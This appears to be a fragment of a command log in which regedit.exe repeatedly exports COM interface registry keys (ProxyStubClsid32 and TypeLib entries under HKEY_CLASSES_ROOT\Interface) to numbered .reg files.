/e "661.reg" "HKEY_CLASSES_ROOT\Interface\{000C031E-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "662.reg" "HKEY_CLASSES_ROOT\Interface\{000C031D-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "663.reg" "HKEY_CLASSES_ROOT\Interface\{000C0320-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "664.reg" "HKEY_CLASSES_ROOT\Interface\{000C0324-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "665.reg" "HKEY_CLASSES_ROOT\Interface\{000C0322-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "666.reg" "HKEY_CLASSES_ROOT\Interface\{000C0321-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "667.reg" "HKEY_CLASSES_ROOT\Interface\{000C0318-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "668.reg" "HKEY_CLASSES_ROOT\Interface\{000C0317-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "669.reg" "HKEY_CLASSES_ROOT\Interface\{000C0316-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "670.reg" "HKEY_CLASSES_ROOT\Interface\{000C0319-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "671.reg" "HKEY_CLASSES_ROOT\Interface\{000C031C-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "672.reg" "HKEY_CLASSES_ROOT\Interface\{000C031B-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "673.reg" "HKEY_CLASSES_ROOT\Interface\{000C031A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "674.reg" "HKEY_CLASSES_ROOT\Interface\{000C0338-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "675.reg" "HKEY_CLASSES_ROOT\Interface\{000C0337-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "676.reg" "HKEY_CLASSES_ROOT\Interface\{000C0334-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "677.reg" "HKEY_CLASSES_ROOT\Interface\{000C0339-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "678.reg" "HKEY_CLASSES_ROOT\Interface\{000C033C-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "679.reg" "HKEY_CLASSES_ROOT\Interface\{000C033B-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "680.reg" "HKEY_CLASSES_ROOT\Interface\{000C033A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "681.reg" "HKEY_CLASSES_ROOT\Interface\{000C032E-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "682.reg" "HKEY_CLASSES_ROOT\Interface\{000C0328-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "683.reg" "HKEY_CLASSES_ROOT\Interface\{000C0326-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "684.reg" "HKEY_CLASSES_ROOT\Interface\{000C0330-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "685.reg" "HKEY_CLASSES_ROOT\Interface\{000C0333-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "686.reg" "HKEY_CLASSES_ROOT\Interface\{000C0332-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "687.reg" "HKEY_CLASSES_ROOT\Interface\{000C0331-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "688.reg" "HKEY_CLASSES_ROOT\Interface\{305106D0-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "689.reg" "HKEY_CLASSES_ROOT\Interface\{305106CE-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "690.reg" "HKEY_CLASSES_ROOT\Interface\{305106CC-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "691.reg" "HKEY_CLASSES_ROOT\Interface\{305106D2-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "692.reg" "HKEY_CLASSES_ROOT\Interface\{305106D8-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "693.reg" "HKEY_CLASSES_ROOT\Interface\{305106D6-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "694.reg" "HKEY_CLASSES_ROOT\Interface\{305106D4-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "695.reg" "HKEY_CLASSES_ROOT\Interface\{305106CA-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "696.reg" "HKEY_CLASSES_ROOT\Interface\{305106C2-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "697.reg" "HKEY_CLASSES_ROOT\Interface\{305104C2-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "698.reg" "HKEY_CLASSES_ROOT\Interface\{305104C1-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "699.reg" "HKEY_CLASSES_ROOT\Interface\{305106C4-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "700.reg" "HKEY_CLASSES_ROOT\Interface\{305106C7-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "701.reg" "HKEY_CLASSES_ROOT\Interface\{305106C6-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "702.reg" "HKEY_CLASSES_ROOT\Interface\{305106C5-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "703.reg" "HKEY_CLASSES_ROOT\Interface\{305106DA-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "704.reg" "HKEY_CLASSES_ROOT\Interface\{305106F4-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "705.reg" "HKEY_CLASSES_ROOT\Interface\{305106F3-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "706.reg" "HKEY_CLASSES_ROOT\Interface\{305106EE-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "707.reg" "HKEY_CLASSES_ROOT\Interface\{305106FD-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "708.reg" "HKEY_CLASSES_ROOT\Interface\{30510706-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "709.reg" "HKEY_CLASSES_ROOT\Interface\{30510705-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "710.reg" "HKEY_CLASSES_ROOT\Interface\{30510704-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "711.reg" "HKEY_CLASSES_ROOT\Interface\{305106ED-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "712.reg" "HKEY_CLASSES_ROOT\Interface\{305106E8-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "713.reg" "HKEY_CLASSES_ROOT\Interface\{305106E7-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "714.reg" "HKEY_CLASSES_ROOT\Interface\{305106DE-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "715.reg" "HKEY_CLASSES_ROOT\Interface\{305106E9-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "716.reg" "HKEY_CLASSES_ROOT\Interface\{305106EC-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "717.reg" "HKEY_CLASSES_ROOT\Interface\{305106EB-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "718.reg" "HKEY_CLASSES_ROOT\Interface\{305106EA-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "719.reg" "HKEY_CLASSES_ROOT\Interface\{305104C0-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "720.reg" "HKEY_CLASSES_ROOT\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "721.reg" "HKEY_CLASSES_ROOT\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "722.reg" "HKEY_CLASSES_ROOT\Interface\{2EC1F844-766A-47A1-91F4-2EEB6190F80C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "723.reg" "HKEY_CLASSES_ROOT\Interface\{3050F2D2-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "724.reg" "HKEY_CLASSES_ROOT\Interface\{3050F5A3-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "725.reg" "HKEY_CLASSES_ROOT\Interface\{3050F5A2-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "726.reg" "HKEY_CLASSES_ROOT\Interface\{3050F2D3-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "727.reg" "HKEY_CLASSES_ROOT\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "728.reg" "HKEY_CLASSES_ROOT\Interface\{2DDBF3D4-8CB8-43CF-B1CA-834987325EE1}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "729.reg" "HKEY_CLASSES_ROOT\Interface\{2DDBF3D4-8CB8-43CF-B1CA-834987325EE1}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "730.reg" "HKEY_CLASSES_ROOT\Interface\{2DA16203-3F58-404F-839D-E4CDE7DD0DED}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "731.reg" "HKEY_CLASSES_ROOT\Interface\{2DEA7885-1846-411F-A41E-017A8FD778FF}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "732.reg" "HKEY_CLASSES_ROOT\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "733.reg" "HKEY_CLASSES_ROOT\Interface\{2DEA7885-1846-411F-A41E-017A8FD778FF}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "734.reg" "HKEY_CLASSES_ROOT\Interface\{2DEA7885-1846-411F-A41E-017A8FD778FF}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "735.reg" "HKEY_CLASSES_ROOT\Interface\{3050F5A4-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "736.reg" "HKEY_CLASSES_ROOT\Interface\{305104BA-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "737.reg" "HKEY_CLASSES_ROOT\Interface\{305104B9-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "738.reg" "HKEY_CLASSES_ROOT\Interface\{305104B8-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "739.reg" "HKEY_CLASSES_ROOT\Interface\{305104BC-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "740.reg" "HKEY_CLASSES_ROOT\Interface\{305104BF-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "741.reg" "HKEY_CLASSES_ROOT\Interface\{305104BE-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "742.reg" "HKEY_CLASSES_ROOT\Interface\{305104BD-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "743.reg" "HKEY_CLASSES_ROOT\Interface\{305104B7-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "744.reg" "HKEY_CLASSES_ROOT\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "745.reg" "HKEY_CLASSES_ROOT\Interface\{3050F5A6-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "746.reg" "HKEY_CLASSES_ROOT\Interface\{3050F5A5-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "747.reg" "HKEY_CLASSES_ROOT\Interface\{305104AE-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "748.reg" "HKEY_CLASSES_ROOT\Interface\{305104B6-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "749.reg" "HKEY_CLASSES_ROOT\Interface\{305104B5-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "750.reg" "HKEY_CLASSES_ROOT\Interface\{305104AF-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "751.reg" "HKEY_CLASSES_ROOT\Interface\{30590088-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "752.reg" "HKEY_CLASSES_ROOT\Interface\{30590087-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "753.reg" "HKEY_CLASSES_ROOT\Interface\{30590086-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "754.reg" "HKEY_CLASSES_ROOT\Interface\{30590089-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "755.reg" "HKEY_CLASSES_ROOT\Interface\{30590092-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "756.reg" "HKEY_CLASSES_ROOT\Interface\{3059008B-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "757.reg" "HKEY_CLASSES_ROOT\Interface\{3059008A-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "758.reg" "HKEY_CLASSES_ROOT\Interface\{30590081-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "759.reg" "HKEY_CLASSES_ROOT\Interface\{3059007C-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "760.reg" "HKEY_CLASSES_ROOT\Interface\{30590079-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "761.reg" "HKEY_CLASSES_ROOT\Interface\{30590078-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "762.reg" "HKEY_CLASSES_ROOT\Interface\{3059007D-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "763.reg" "HKEY_CLASSES_ROOT\Interface\{30590080-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "764.reg" "HKEY_CLASSES_ROOT\Interface\{3059007F-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "765.reg" "HKEY_CLASSES_ROOT\Interface\{3059007E-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "766.reg" "HKEY_CLASSES_ROOT\Interface\{30590093-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "767.reg" "HKEY_CLASSES_ROOT\Interface\{305900A7-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "768.reg" "HKEY_CLASSES_ROOT\Interface\{305900A1-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "769.reg" "HKEY_CLASSES_ROOT\Interface\{305900A0-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "770.reg" "HKEY_CLASSES_ROOT\Interface\{305900A8-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "771.reg" "HKEY_CLASSES_ROOT\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "772.reg" "HKEY_CLASSES_ROOT\Interface\{305900BA-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "773.reg" "HKEY_CLASSES_ROOT\Interface\{305900A9-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "774.reg" "HKEY_CLASSES_ROOT\Interface\{3059009F-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "775.reg" "HKEY_CLASSES_ROOT\Interface\{3059009A-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "776.reg" "HKEY_CLASSES_ROOT\Interface\{30590098-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "777.reg" "HKEY_CLASSES_ROOT\Interface\{30590097-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "778.reg" "HKEY_CLASSES_ROOT\Interface\{3059009B-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "779.reg" "HKEY_CLASSES_ROOT\Interface\{3059009E-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "780.reg" "HKEY_CLASSES_ROOT\Interface\{3059009D-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "781.reg" "HKEY_CLASSES_ROOT\Interface\{3059009C-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "782.reg" "HKEY_CLASSES_ROOT\Interface\{30590077-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "783.reg" "HKEY_CLASSES_ROOT\Interface\{30510742-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "784.reg" "HKEY_CLASSES_ROOT\Interface\{30510740-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "785.reg" "HKEY_CLASSES_ROOT\Interface\{3051073C-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "786.reg" "HKEY_CLASSES_ROOT\Interface\{30510744-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "787.reg" "HKEY_CLASSES_ROOT\Interface\{3051074B-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "788.reg" "HKEY_CLASSES_ROOT\Interface\{30510748-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "789.reg" "HKEY_CLASSES_ROOT\Interface\{30510746-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "790.reg" "HKEY_CLASSES_ROOT\Interface\{30510738-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "791.reg" "HKEY_CLASSES_ROOT\Interface\{30510709-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "792.reg" "HKEY_CLASSES_ROOT\Interface\{30510708-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "793.reg" "HKEY_CLASSES_ROOT\Interface\{30510707-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "794.reg" "HKEY_CLASSES_ROOT\Interface\{30510720-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "795.reg" "HKEY_CLASSES_ROOT\Interface\{30510736-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "796.reg" "HKEY_CLASSES_ROOT\Interface\{30510731-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "797.reg" "HKEY_CLASSES_ROOT\Interface\{30510722-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "798.reg" "HKEY_CLASSES_ROOT\Interface\{3051074E-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "799.reg" "HKEY_CLASSES_ROOT\Interface\{30590072-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "800.reg" "HKEY_CLASSES_ROOT\Interface\{30590071-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "801.reg" "HKEY_CLASSES_ROOT\Interface\{30590070-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "802.reg" "HKEY_CLASSES_ROOT\Interface\{30590073-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "803.reg" "HKEY_CLASSES_ROOT\Interface\{30590076-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "804.reg" "HKEY_CLASSES_ROOT\Interface\{30590075-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "805.reg" "HKEY_CLASSES_ROOT\Interface\{30590074-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "806.reg" "HKEY_CLASSES_ROOT\Interface\{30590034-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "807.reg" "HKEY_CLASSES_ROOT\Interface\{30510760-98B6-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "808.reg" "HKEY_CLASSES_ROOT\Interface\{30510752-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "809.reg" "HKEY_CLASSES_ROOT\Interface\{30510750-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "810.reg" "HKEY_CLASSES_ROOT\Interface\{30510761-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "811.reg" "HKEY_CLASSES_ROOT\Interface\{30590033-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "812.reg" "HKEY_CLASSES_ROOT\Interface\{30510765-98B6-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "813.reg" "HKEY_CLASSES_ROOT\Interface\{30510763-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "814.reg" "HKEY_CLASSES_ROOT\Interface\{0AAEDF0B-D333-4B27-A0C6-BBF31413A42E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "815.reg" "HKEY_CLASSES_ROOT\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "816.reg" "HKEY_CLASSES_ROOT\Interface\{08A9E040-9A9C-4F42-B5F5-2029B8F17E1D}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "817.reg" "HKEY_CLASSES_ROOT\Interface\{08A9E040-9A9C-4F42-B5F5-2029B8F17E1D}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "818.reg" "HKEY_CLASSES_ROOT\Interface\{0f872661-c863-47a4-863f-c065c182858a}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "819.reg" "HKEY_CLASSES_ROOT\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "820.reg" "HKEY_CLASSES_ROOT\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "821.reg" "HKEY_CLASSES_ROOT\Interface\{0f872661-c863-47a4-863f-c065c182858a}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "822.reg" "HKEY_CLASSES_ROOT\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "823.reg" "HKEY_CLASSES_ROOT\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "824.reg" "HKEY_CLASSES_ROOT\Interface\{03C2AEA5-BEFA-4C84-A187-C9245AC784F6}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "825.reg" "HKEY_CLASSES_ROOT\Interface\{03C2AEA5-BEFA-4C84-A187-C9245AC784F6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "826.reg" "HKEY_CLASSES_ROOT\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

